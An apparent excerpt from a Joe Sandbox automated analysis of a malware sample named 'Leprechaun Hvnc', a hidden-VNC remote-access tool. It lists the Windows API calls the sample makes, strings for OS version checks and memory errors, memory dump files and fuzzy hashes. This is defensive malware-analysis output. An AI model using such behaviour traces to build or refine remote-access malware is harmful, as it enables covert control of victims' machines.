  • HeapAlloc.KERNEL32(00000000), ref: 00491701
  • VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001), ref: 0049174A
  • VerifyVersionInfoW.KERNEL32(00000000,00000080,00000000), ref: 00491758
  • lstrcpyW.KERNEL32(00000000,Windows Home Server), ref: 0049178F
  • lstrcpyW.KERNEL32(00000000,Windows Server 2003), ref: 004917A3
Strings
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: Heap$AllocProcesslstrcpy$AddressConditionInfoLibraryLoadMaskProcVerifyVersion
  • String ID: RtlGetVersion$Windows 10$Windows 11$Windows 7$Windows 8$Windows 8.1$Windows Home Server$Windows Server 2003$Windows Server 2008$Windows Server 2008 R2$Windows Server 2012$Windows Server 2012 R2$Windows Server 2019$Windows Server 2022$Windows Vista$Windows XP Professional x64 Edition$Windows xp$ntdll.dll
  • API String ID: 1189709698-3794385023
  • Opcode ID: 7fb5547c65de7e8ed7fd27fc34eb1a78e59c1df0dcc7da122381fa905c24248a
  • Instruction ID: 7cec6c4b5e36491248f64e88146802816f216f15a2830b8eeffadb7d59a99067
  • Opcode Fuzzy Hash: 7fb5547c65de7e8ed7fd27fc34eb1a78e59c1df0dcc7da122381fa905c24248a
  • Instruction Fuzzy Hash: 5B71FA3A7402095BCF305B69EC4AFFA3F68D7D5726F1005B7FA09D2350D67C484A86A9

Control-flow Graph

APIs
  • GetProcessHeap.KERNEL32(00000008,00000044,00000000,?,7622F380,?,?,004938F3,00000000), ref: 00491131
  • HeapAlloc.KERNEL32(00000000,?,?,004938F3,00000000), ref: 0049113A
  • GetStdHandle.KERNEL32(000000F5,?,?,004938F3,00000000), ref: 00491144
  • WriteConsoleA.KERNEL32(00000000,Error: Failed to allocate memory for STARTUPINFOA.,00000032,004938F3,00000000,?,?,004938F3,00000000), ref: 00491157
  • GetProcessHeap.KERNEL32(00000008,00000010,?,?,004938F3,00000000), ref: 0049116A
  • HeapAlloc.KERNEL32(00000000,?,?,004938F3,00000000), ref: 0049116D
  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,004938F3,00000000), ref: 0049117A
  • HeapFree.KERNEL32(00000000,?,?,004938F3,00000000), ref: 0049117D
  • GetStdHandle.KERNEL32(000000F5,?,?,004938F3,00000000), ref: 00491185
  • WriteConsoleA.KERNEL32(00000000,Error: Failed to allocate memory for PROCESS_INFORMATION.,00000039,004938F3,00000000,?,?,004938F3,00000000), ref: 00491198
Strings
  • Error: Failed to allocate memory for STARTUPINFOA., xrefs: 00491151
  • Error: Failed to allocate memory for PROCESS_INFORMATION., xrefs: 00491192
Memory Dump Source
  • Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
  • Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd
Similarity
  • API ID: Heap$Process$AllocConsoleHandleWrite$Free
  • String ID: Error: Failed to allocate memory for PROCESS_INFORMATION.$Error: Failed to allocate memory for STARTUPINFOA.
  • API String ID: 4149499039-142677882
  • Opcode ID: 285caa00f38478753cc5f2cfb51da3c49e4aa3488ad738674cbe01693a43dae1
  • Instruction ID: 19e1f01cabf907939748e861c56aeb984e217420440311f00251cd15dd6a2d54
  • Opcode Fuzzy Hash: 285caa00f38478753cc5f2cfb51da3c49e4aa3488ad738674cbe01693a43dae1
  • Instruction Fuzzy Hash: CB219972A84218BBEA2067E9EC4AF9B7B5CEBD9761F100177F704E71D0D5A0590186B4